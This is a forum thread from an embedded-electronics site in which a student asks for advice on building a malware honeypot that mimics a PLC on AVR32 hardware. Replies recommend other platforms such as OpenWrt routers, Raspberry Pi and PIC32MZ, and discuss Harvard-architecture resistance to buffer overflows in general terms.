Help creating a Honeypot for an AVR architecture

Go To Last Post
13 posts / 0 new
Author
Message
#1
  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

I'm talking a class that it composed mostly by masters students in computer security. The grade is based on a group project and my grup is compsed by four computer science students

 

We were tasked with creating a Honeypot for an avr32 archtecture. The goal is to not only capture the malware but to also see what it does to the system.

 

The only solution that we could think of was finding an linux distro and altering it , so the syscalls are somewhat transparent and we can understand what the malware does. I did some research and BuildRoots seems to be the way to go, as it's somewhat simple, flexible and it has a lot of sources in the web(specially avr related).

 

Do you guys have any input to give me? Is this a good Idea or there are other options that i'm not seeing?

 

Any tips about what to study is pretty welcome.

Last Edited: Thu. Apr 26, 2018 - 09:56 PM
  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

Hello!

Look at the ARM devices as the 32U devices are not a popular choice.

There are others here far better qualified than I to advise you on the other parts of your questions so I will leave that to them

Jim

I would rather attempt something great and fail, than attempt nothing and succeed - Fortune Cookie

 

"The critical shortage here is not stuff, but time." - Johan Ekdahl

 

"Step N is required before you can do step N+1!" - ka7ehk

 

"If you want a career with a known path - become an undertaker. Dead people don't sue!" - Kartman

"Why is there a "Highway to Hell" and only a "Stairway to Heaven"? A prediction of the expected traffic load?"  - Lee "theusch"

 

Speak sweetly. It makes your words easier to digest when at a later date you have to eat them ;-)  - Source Unknown

Please Read: Code-of-Conduct

Atmel Studio6.2/AS7, DipTrace, Quartus, MPLAB, RSLogix user

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

lucaslo wrote:
avr32 archtecture ... linux distro

See: https://www.avrfreaks.net/forum/avr32-support-dropped-linux-kernel

 

can't imagine there's anyone putting much effort into malware for such obscure systems ... ?

Top Tips:

  1. How to properly post source code - see: https://www.avrfreaks.net/comment... - also how to properly include images/pictures
  2. "Garbage" characters on a serial terminal are (almost?) invariably due to wrong baud rate - see: https://learn.sparkfun.com/tutorials/serial-communication
  3. Wrong baud rate is usually due to not running at the speed you thought; check by blinking a LED to see if you get the speed you expected
  4. Difference between a crystal, and a crystal oscillatorhttps://www.avrfreaks.net/comment...
  5. When your question is resolved, mark the solution: https://www.avrfreaks.net/comment...
  6. Beginner's "Getting Started" tips: https://www.avrfreaks.net/comment...
  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

lucaslo wrote:
I did some research and BuildRoots seems to be the way to go, as it's somewhat simple, flexible and it has a lot of sources in the web(specially avr related).
Is OpenWrt based on buildroot?

fyi, AVR32 is in OpenWrt version 10 (current is 17)

lucaslo wrote:
... or there are other options that i'm not seeing?
Does it have to be AVR32?

Reasons :

  • MIPS routers are ubiquitous
  • SAMA5 may be one Microchip follow-on to AVR32

 


https://openwrt.org/start?do=search&id=start&q=AT32AP7000

http://www.at91.com/linux4sam/bin/view/Linux4SAM/BuildRoot via http://www.at91.com/linux4sam/bin/view/Linux4SAM/Sama5d27Som1EKMainPage#Demo_archives

 

"Dare to be naïve." - Buckminster Fuller

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

The AVR32 application processors are well EOL (end of life). As Awneil mentions, most wifi routers are MIPS based, so you can purchase at low cost suitable hardware and put OpenWRT on them. The benefit of OpenWRT is that it has a mature build system ( probably buildroot based) and a lot of prebuilt applications and utilities.

From experience, you don't need to do too much apart from having your device on the internet to get hacking attempts. I (stupidly) set up a 3G node as a server. I was attacked by some people from China (or so the ip addresses would indicate). Whilst they didn't gain access, they did manage to chew up a lot of the data via 3G I was paying for.

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

Kartman wrote:
The AVR32 application processors are well EOL (end of life).

As Cliff points out in the thread I linked earlier, the currently-available UC3 are not application processors - so not a basis for Linux:

 

https://www.avrfreaks.net/commen...

 

As Awneil mentions, most wifi routers are MIPS based

Actually, that was gchapman

 

 

EDIT

 

typo

Top Tips:

  1. How to properly post source code - see: https://www.avrfreaks.net/comment... - also how to properly include images/pictures
  2. "Garbage" characters on a serial terminal are (almost?) invariably due to wrong baud rate - see: https://learn.sparkfun.com/tutorials/serial-communication
  3. Wrong baud rate is usually due to not running at the speed you thought; check by blinking a LED to see if you get the speed you expected
  4. Difference between a crystal, and a crystal oscillatorhttps://www.avrfreaks.net/comment...
  5. When your question is resolved, mark the solution: https://www.avrfreaks.net/comment...
  6. Beginner's "Getting Started" tips: https://www.avrfreaks.net/comment...
  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

Mea culpa! Must’ve scrolled too fast on the phone.

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

If one wants to play the "Linux game" then apart from the obvious choice of actually doing it on a PC - running the Linux in a Virtual Machine - is the next most obvious these days not simply to buy a Raspberry Pi and work with that?

 

Why would you choose some obsolete old Atmel for such experiments? If you do want to stick with the Atmel (well Microchip) brand then I'm sure they have Cortex A CPUs and boards - but I bet you find they are considerably more expensive than RPis.

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

A lot of helpful answers.

 

I should have clarified a little better what the assignment was. There are no hard lines or a pdf with an specification, the professor just told us that we should make a Honeypot for an PLC, and not to just capture malware but to also see what it does to a system.

 

It needs to look like it's operating something in a factory floor and it's not a PC.

The professor is always open for dialogue and not at all strict. If i can make my case to him and my group I'm pretty sure I'm allowed to divert from the original idea.

 

The avr32 is the only piece of hardware that is used in Manufacturing that we could get our hands on.

I was open to find a way to emulate a PLC, but my group partners insist that if we emulate one we would never be able to see what the malware does in real life, just infer it from the code.

 

gchapman wrote:

Reasons :

  • MIPS routers are ubiquitous
  • SAMA5 may be one Microchip follow-on to AVR32

 

OpenWRT seems to be great and we do have money to a router, but even If i spend a lot of time making a custom firmware will it look like a PLC for the malware? I'm familiar with MIPS instructions and some architectures but I have no Idea how this intersects with PLC. 

 

awneil wrote:

lucaslo wrote:
avr32 archtecture ... linux distro

See: https://www.avrfreaks.net/forum/avr32-support-dropped-linux-kernel

 

can't imagine there's anyone putting much effort into malware for such obscure systems ... ?

 

I've been told many times that anything you put online gets attacked , but I definitely don't want to spend energy and time learning about a technology with no practical use.

 

clawson wrote:

If one wants to play the "Linux game" then apart from the obvious choice of actually doing it on a PC - running the Linux in a Virtual Machine - is the next most obvious these days not simply to buy a Raspberry Pi and work with that?

 

Why would you choose some obsolete old Atmel for such experiments? If you do want to stick with the Atmel (well Microchip) brand then I'm sure they have Cortex A CPUs and boards - but I bet you find they are considerably more expensive than RPis.

 

I believe that A raspberry pi is also in our budget.

We are not interested in linux per se, that was the only way that I could think of to see what the malware does, by monitoring the syscalls, and altering a linux distro seemed like the easiest way to do this.

We really need to focus in hardware used to control manufacturing, as there are already tons of work being done with PC in our department.

 

Thanks everyone

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

If you are particularly focussing on Syscalls in Linux then clearly you need some hardware that runs Linux?

 

If you are thinking more of external attacks on "industrial controllers" I think you first need to specify exactly what you mean by "industrial controller". Sure there may be some high level ones that run Linux but the majority are more likely going to be 8 or 16 bit micros not specifically running an "OS" but some dedicated embedded software tailored to the task. There's not going to be a "standard" security solution for such devices. It's going to completely depend on their external comms channels and how they are handled. Also note that many such devices (and certainly AVR8 based ones) are Harvard not von Neumann so they don't keep their code in the same memory space as "exploitable" data. So concepts such as over-running buffers to corrupt return stacks and embed additional executable sequences just isn't going to work because they won't run code out of RAM.

 

It's going to tend to be "bigger processors" that share DRAM for code and data that can be subject to such exploits.

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

lucaslo wrote:
I've been told many times that anything you put online gets attacked , but I definitely don't want to spend energy and time learning about a technology with no practical use.

Malware which attacks the system at a shell scripting level could be used to target machines in a CPU-agnostic way. (I'm thinking about vulnerabilities similar to ShellShock, for example.) So one of the old AVR32-based AP7 processors running Linux might be affected by a certain subset of malware even though nobody was deliberately targeting them.

 

But anyway, it would be difficult for you to get your hands on an AP7-based AVR32 system today. (Although, the outdated state of the Linux kernel and userspace utilities for those devices would make them prime candidates to contain unpatched vulnerabilities.)

 

I've found evidence of at least one Master's thesis project which claims to have successfully patched the MMU-less variant of Linux to run on a AT32UC3A0512 device with loads of external SRAM, a patched version of GCC (and associated utilities) to produce binaries for such a platform, and a patched version of U-Boot to fire it all up... But now we're talking about the extreme fringes of esoteric platforms, and certainly not a good example of any real-world scenario.

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

lucaslo wrote:
the professor just told us that we should make a Honeypot for an PLC, and not to just capture malware but to also see what it does to a system.

Then he should have suggested where to find or provided the target PLC!

 

 

FF = PI > S.E.T

 

  • 1
  • 2
  • 3
  • 4
  • 5
Total votes: 0

lfmorrison wrote:
[one's masters thesis on UC3A0 uClinux]... But now we're talking about the extreme fringes of esoteric platforms, and certainly not a good example of any real-world scenario.
Cool!

A possible follow-on effort could leverage LiteBSD on PIC32MZ.

Some PIC32MZ boards have Ethernet PHY so could be an Internet honeypot.

But, a PIC32MZ for PLC would more likely run and/or

  • RTOS
  • WebSocket server (careful design to separate real-time from server-side)

 

https://github.com/sergev/LiteBSD/wiki (LiteBSD)

https://www.microchip.com/design-centers/32-bit/pic-32-bit-mcus/pic32mz-ef-family

https://realtimelogic.com/products/sharkssl/minnow-server/

 

"Dare to be naïve." - Buckminster Fuller